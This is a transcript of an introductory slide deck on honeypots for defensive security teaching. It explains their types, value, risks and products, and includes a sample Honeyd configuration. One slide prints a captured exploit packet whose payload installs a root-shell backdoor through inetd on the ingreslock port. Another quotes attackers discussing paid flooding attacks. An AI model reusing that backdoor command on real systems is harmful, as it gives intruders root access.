To Introduce You to Honeypots, What They
Transcript of To Introduce You to Honeypots, What They
-
8/14/2019 To Introduce You to Honeypots, What They
1/33
Honeypots
-
8/14/2019 To Introduce You to Honeypots, What They
2/33
Purpose
To introduce you to honeypots, what they
are, how they work, their value.
-
8/14/2019 To Introduce You to Honeypots, What They
3/33
Definition
Any security resource whos value lies in beingprobed, attacked, or compromised
-
8/14/2019 To Introduce You to Honeypots, What They
4/33
How honeypots work
Simple concept
A resource that expects no data, so any
traffic to or from it is most likely
unauthorized activity
-
8/14/2019 To Introduce You to Honeypots, What They
5/33
Not limited to specific purpose
Honeypots do not solve a specific problem,
instead they are a tool that contribute to your
overall security architecture.
Their value, and the problems they help solve,
depend on how build, deploy, and you usethem.
-
8/14/2019 To Introduce You to Honeypots, What They
6/33
Types
Production (Law Enforcment)
Research (Counter-Intelligence)
Martys idea
-
8/14/2019 To Introduce You to Honeypots, What They
7/33
Value
What is the value of honeypots?
One of the greatest areas of confusion
concerning honeypot technologies.
-
8/14/2019 To Introduce You to Honeypots, What They
8/33
Advantages
Based on how honeypots conceptually
work, they have several advantages.
Reduce False Positives and False Negatives
Data Value
Resources
Simplicity
-
8/14/2019 To Introduce You to Honeypots, What They
9/33
Disadvantages
Based on the concept of honeypots, they
also have disadvantages:
Narrow Field of View
Fingerprinting
Risk
-
8/14/2019 To Introduce You to Honeypots, What They
10/33
Production
Prevention
Detection
Response
-
8/14/2019 To Introduce You to Honeypots, What They
11/33
Prevention
Keeping the burglar out of your house.
Honeypots, in general are not effective prevention
mechanisms.
Deception, Deterence, Decoys, are phsychological
weapons. They do NOT work against automated
attacks:
worms
auto-rooters
mass-rooters
-
8/14/2019 To Introduce You to Honeypots, What They
12/33
Detection
Detecting the burglar when he breaks in.
Honeypots excel at this capability, due to
their advantages.
-
8/14/2019 To Introduce You to Honeypots, What They
13/33
Response
Honeypots can be used to help respond to
an incident.
Can easily be pulled offline (unlike production
systems.
Little to no data pollution.
-
8/14/2019 To Introduce You to Honeypots, What They
14/33
Research Honeypots
Early Warning and Prediction
Discover new Tools and Tactics
Understand Motives, Behavior, and
Organization
Develop Analysis and Forensic Skills
-
8/14/2019 To Introduce You to Honeypots, What They
15/33
Early Warning and Prediction
-
8/14/2019 To Introduce You to Honeypots, What They
16/33
Tools
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32
TCP Options (3) => NOP NOP TS: 463986683 4158792
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e0030 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@.
D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#..
82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh
20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/
74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/
69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x;
73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm
20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
-
8/14/2019 To Introduce You to Honeypots, What They
17/33
Tactics
-
8/14/2019 To Introduce You to Honeypots, What They
18/33
Motives and Behavior
J4ck: why don't you start charging for packet
attacks?
J4ck: "give me x amount and I'll take bla bla offline
for this amount of time"J1LL: it was illegal last I checked.
J4ck: heh, then everything you do is illegal. Why not
make money off of it?
J4ck:I know plenty of people that'd pay exorbatent
amounts for packeting.
-
8/14/2019 To Introduce You to Honeypots, What They
19/33
Level of Interaction
Level of Interaction determines amount of
functionality a honeypot provides.
The greater the interaction, the more you
can learn.
The greater the interaction, the more
complexity and risk.
-
8/14/2019 To Introduce You to Honeypots, What They
20/33
Risk
Chance that an attacker can use your
honeypot to harm, attack, or infiltrate other
systems or organizations.
-
8/14/2019 To Introduce You to Honeypots, What They
21/33
Low Interaction
Provide Emulated Services
No operating system for attacker to access.
Information limited to transactional
information and attackers activities with
emulated services.
-
8/14/2019 To Introduce You to Honeypots, What They
22/33
High Interaction
Provide Actual Operating Systems
Learn extensive amounts of information.
Extensive risk.
-
8/14/2019 To Introduce You to Honeypots, What They
23/33
Honeypots
BackOfficer Friendly
http://www.nfr.com/products/bof/
SPECTER http://www.specter.com
Honeyd http://www.citi.umich.edu/u/provos/honeyd/
ManTrap
http://www.recourse.com
Honeynets http://project.honeynet.org/papers/honeynet/
LowInteraction
HighInteraction
-
8/14/2019 To Introduce You to Honeypots, What They
24/33
BackOfficer Friendly
-
8/14/2019 To Introduce You to Honeypots, What They
25/33
Specter
-
8/14/2019 To Introduce You to Honeypots, What They
26/33
Honeyd
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
add default tcp port 113 reset
add default tcp port 1 reset
create windows
set windows ersonalit "Windows NT 4.0 Server SP5-SP6"
-
8/14/2019 To Introduce You to Honeypots, What They
27/33
ManTrap
-
8/14/2019 To Introduce You to Honeypots, What They
28/33
Honeynets
-
8/14/2019 To Introduce You to Honeypots, What They
29/33
Which is best?
None, they all have their advantages anddisadvantages. It depends on what you are
attempting to achieve.
-
8/14/2019 To Introduce You to Honeypots, What They
30/33
-
8/14/2019 To Introduce You to Honeypots, What They
31/33
Legal Contact for
.mil / .gov
Department of Justice, Computer Crime and
Intellectual Property Section
General Number: (202) 514-1026Specific Contact: Richard Salgado
Direct Telephone (202) 353-7848
E-Mai: [email protected]
mailto:[email protected]:[email protected] -
8/14/2019 To Introduce You to Honeypots, What They
32/33
Summary
Honeypos are a highly flexible security tool
that can be used in a variety of different
deployments.
-
8/14/2019 To Introduce You to Honeypots, What They
33/33
Resources
Honeypots: Tracking Hackers
http://www.tracking-hackers.com